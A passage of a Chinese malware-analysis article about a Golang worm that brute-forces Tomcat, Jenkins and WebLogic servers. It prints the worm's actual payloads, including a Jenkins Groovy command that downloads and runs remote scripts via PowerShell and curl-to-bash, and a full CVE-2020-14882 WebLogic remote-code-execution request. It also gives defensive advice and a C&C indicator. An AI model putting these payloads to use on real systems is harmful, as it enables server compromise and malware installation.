新型 Golang 蠕虫在服务器上投放病毒( 二 ) _蠕虫

文章插图
图8：MySQL查询——Windows有效负载
Tomcat：8080端口
恶意软件将使用基本身份验证在管理面板上运行凭据。

文章插图
图9：Tomcat管理面板的身份验证请求示例
试用成功后，恶意软件将尝试部署WAR文件（Web应用程序资源），该文件将用于传输包含恶意有效负载的1.jsp文件。
该恶意软件将发送Get请求并使用jsp文件解析参数%s/1.jsp?win=%s&linux=%s 。这些参数将包含dropper脚本URL 。然后， jsp脚本将删除并运行加载程序。

文章插图
图10：1.jsp文件脚本
Jenkins：端口8080
与以前的攻击类似，该恶意软件暴力破解Jenkins密码，登录并运行以下负载：
cmd@/c@powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)!bash@-c@(curl -fsSL %s || wget -q -O – %s) | bash

println “%s”+”%s”;def s=new String(Base64.getDecoder().decode(“%s”+”%s”.reverse())).split(“!”);def c=System.getProperty(“os.name”).contains(“indo”)?s[0].split(“@”):s[1].split(“@”);c.execute()
WebLogic：7001端口
在旧版本中，该恶意软件利用了最新的WebLogic远程代码执行漏洞CVE-2020-14882 。它将获取请求发送到WebLogic服务，并将GET请求标头用作有效负载的一部分。
GET
/console/css/%%25%%32%%65%%25%%32%%65%%25%%32%%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(‘weblogic.work.ExecuteThread
%%20currentThread(weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.
WorkAdapter%%20adapter=currentThread.getCurrentWork();JAVA.lang.reflect.Field%%20
field=adapter.getClass().getDeclaredField(“connectionHandler”);field.setAccessible
(true);Object%%20obj=field.get(adapter);weblogic.servlet.internal.ServletRequestI
mpl%%20req(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod
(“getServletRequest”).invoke(obj);String%%20cmd=**req.getHeader(“cmd”)**;String[]%%
20cmds=System.getProperty(“os.name”).toLowerCase().contains(“win”)?new%%20String[]{“cmd.exe”,”/c”,**req.getHeader(“win”)**}:new%%20String[]{“/bin/sh”,”c”,req.getHeader
(“linux”)};if(cmd!=null{String%%20result=new%%20java.util.Scanner(new%%20java.lang
.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(“%%5C%%5CA”).next();
weblogic.servlet.internal.ServletResponseImpl%%20res(weblogic.servlet.internal.
ServletResponseImpl)req.getClass().getMethod(“getResponse”).invoke(req);work.
getServletOutputStream().writeStream(new%%20weblogic.xml.util.StringInputStream
(result));work.getServletOutputStream().flush
();}currentThread.interrupt();’) HTTP/1.0
Host: %s:%d
User-Agent: Mozilla/5.0 (macintosh; Intel Mac OS X 10.16; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,Application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: close
**cmd**: ls
**linux**: ( (curl -fsSL %s || wget -q -O – %s) | bash& )
**win**: start powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)
预防措施
1.使用复杂的密码，限制登录尝试，并在可能的情况下使用2FA（双重身份验证）。
2.尽量减少使用面向公众的服务。
3.使用最新的安全补丁更新软件。
4.使用Intezer Protect之类的Cloud Workload Protection Platform（CWPP）可获得对系统代码的完整运行时可见性，并在任何恶意或未经授权的代码上收到警报。这里有一个免费的社区版。
总结
在2020年，我们看到了针对不同平台（包括Windows、Linux、Mac和Android）的Golang恶意软件。这种情况将在2021年继续下去。
事实上，蠕虫的PE和ELF恶意软件的代码几乎相同，而ELF恶意软件在VirusTotal中未被检测到，这表明Linux威胁仍然在大多数安全和检测平台下存在。
IoCs
C&C
185[.]239[.]242[.]71（ZoomEye搜索结果）
Files